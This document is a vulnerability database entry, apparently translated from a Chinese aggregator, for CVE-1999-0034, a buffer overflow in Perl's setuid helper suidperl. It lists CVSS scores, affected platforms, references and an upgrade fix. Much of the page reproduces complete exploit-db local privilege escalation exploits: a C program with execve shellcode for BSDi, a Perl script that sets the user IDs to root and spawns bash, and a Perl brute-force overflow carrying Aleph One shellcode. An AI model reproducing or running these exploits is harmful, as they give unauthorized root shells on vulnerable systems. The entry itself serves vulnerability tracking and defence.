CVE-1999-0034
CVSS 7.2
Published: 1997-05-29 00:00:00
Last revised: 2008-09-09 08:33:36

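[Original] Buffer overflow in suidperl (sperl), Perl 4.x and 5.x.


[CNNVD] suidperl (sperl), Perl buffer overflow vulnerability (CNNVD-199705-025)

        A buffer overflow vulnerability exists in suidperl (sperl), Perl 4.x and 5.x.

- CVSS (base score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system shutdown]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)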

cpe:/a:larry_wall:perl:5.3
cpe:/o:redhat:linux:4.2 Red Hat Linux 4.2
cpe:/o:redhat:linux:4.1 Red Hat Linux 4.1
cpe:/o:bsdi:bsd_os:3.0
cpe:/a:sgi:freeware:1.0
cpe:/a:sgi:freeware:2.0
cpe:/o:bsdi:bsd_os:2.1
cpe:/o:redhat:linux:4.0 Red Hat Linux 4.0

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0034
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0034
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199705-025
(Official data source) CNNVD

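- Other links and resources

- Vulnerability information

suidperl (sperl), Perl buffer overflow vulnerability
High risk  Buffer overflow
1997-05-29 00:00:00 2006-11-16 00:00:00
Local
        A buffer overflow vulnerability exists in suidperl (sperl), Perl 4.x and 5.x.

- Advisories and patches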

        

- Vulnerability information (200)

BSDi suidperl Local Stack Buffer Overflow Exploit (EDBID:200)
bsd local
2000-11-21 Verified
0 vade79
N/A
/* (BSDi)suidperl[] buffer overflow, by v9[v9@fakehalo.org].  this is that old
   buffer overflow in suidperl, but i never saw any version of it for BSDi.
   so, here it is.  this gives euid=0. (BSDi/3.0)
*/
#define PATH "/usr/bin/suidperl"	/* path to suidperl on BSDi/3.0. */
#define DEFAULT_OFFSET -5000		/* general offset, a lot of room. */
static char exec[]=
 "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" /* 14 characters. */
 "\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" /* 14 characters. */
 "\xff\xff\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e" /* 14 characters. */
 "\x2f\x73\x68\x00"; /* 4 characters; 46 characters total. */
long pointer(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
 char eip[2048],buf[4096];
 int i,offset;
 long ret;
 printf("[ (BSDi)suidperl[]: buffer overflow, by: v9[v9@fakehalo.org]. ]\n");
 if(argc>1){offset=atoi(argv[1]);}
 else{offset=DEFAULT_OFFSET;}
 ret=(pointer()-offset);
 eip[0]=0x01;
 for(i=1;i<2048;i+=4){*(long *)&eip[i]=ret;}
 eip[1248]=0x0;
 for(i=0;i<(4096-strlen(exec)-strlen(eip));i++){*(buf+i)=0x90;}
 memcpy(buf+i,exec,strlen(exec));
 memcpy(buf,"EXEC=",5);putenv(buf);
 printf("*** [data]: return address: 0x%lx, offset: %d.\n",ret,offset);
 if(execlp(PATH,"suidperl",eip,0)){
  printf("*** [error]: could not execute %s successfully.\n",PATH);
  exit(1);
 }
}


// milw0rm.com [2000-11-21]
		

- Vulnerability information (320)

suid_perl 5.001 vulnerability (EDBID:320)
linux local
1996-06-01 Verified
0 Jon Lewis
N/A
#!/usr/bin/suidperl -U
$ENV{PATH}="/bin:/usr/bin";
$>=0;$<=0;
exec("/bin/bash");


# milw0rm.com [1996-06-01]
		

- Vulnerability information (19546)

BSD/OS 2.1/3.0,Larry Wall Perl 5.0 03,RedHat 4.0/4.1,SGI Freeware 1.0/2.0 suidperl Overflow(1) (EDBID:19546)
multiple local
1997-04-17 Verified
0 Pavel Kankovsky
N/A
source: http://www.securityfocus.com/bid/708/info

Several buffer overflows were found in the Perl helper application 'suidperl' or 'sperl'. When this program is installed setuid root the overflows may lead to a local root compromise. 

 #!/usr/bin/perl

 # yes, this suidperl exploit is in perl, isn't it wonderful? :)

 $| = 1;

 $shellcode =
 "\x90" x 512 . # nops
 "\xbc\xf0\xff\xff\xbf" . # movl $0xbffffff0,%esp
 # "standard shellcode" by Aleph One
 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .
 "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .
 "\x80\xe8\xdc\xff\xff\xff/bin/sh";

 # start and end of .data
 # adjust this using /proc/*/maps

 $databot = 0x080a2000;
 $datatop = 0x080ab000;

 # trial and error loop

 $address = $databot + 4;

 while ($address < $datatop) {
 $smash_me =
 $shellcode . ('A' x (2052 - length($shellcode))) .
 (pack("l", $address) x 1000) . ('B' x 1000);
 $pid = fork();
 if (!$pid) {
 exec('/usr/bin/sperl5.003', $smash_me);
 }
 else {
 wait;
 if ($? == 0) {
 printf("THE MAGIC ADDRESS WAS %08x\n", $address);
 exit;
 }
 }
 $address += 128;
 }
		

- Vulnerability information (19547)

BSD/OS 2.1/3.0,Larry Wall Perl 5.0 03,RedHat 4.0/4.1,SGI Freeware 1.0/2.0 suidperl Overflow(2) (EDBID:19547)
multiple local
1997-04-17 Verified
0 Willy Tarreau
N/A
source: http://www.securityfocus.com/bid/708/info
 
Several buffer overflows were found in the Perl helper application 'suidperl' or 'sperl'. When this program is installed setuid root the overflows may lead to a local root compromise. 

http://www.exploit-db.com/sploits/19547.tgz		

- Vulnerability information

10870
Perl suidperl Unspecified Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified, Third-party Verified

- Vulnerability description

- Timeline

1997-05-01 Unknown
Unknown Unknown

- Solution

Upgrade to version 5.004 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete
 

 
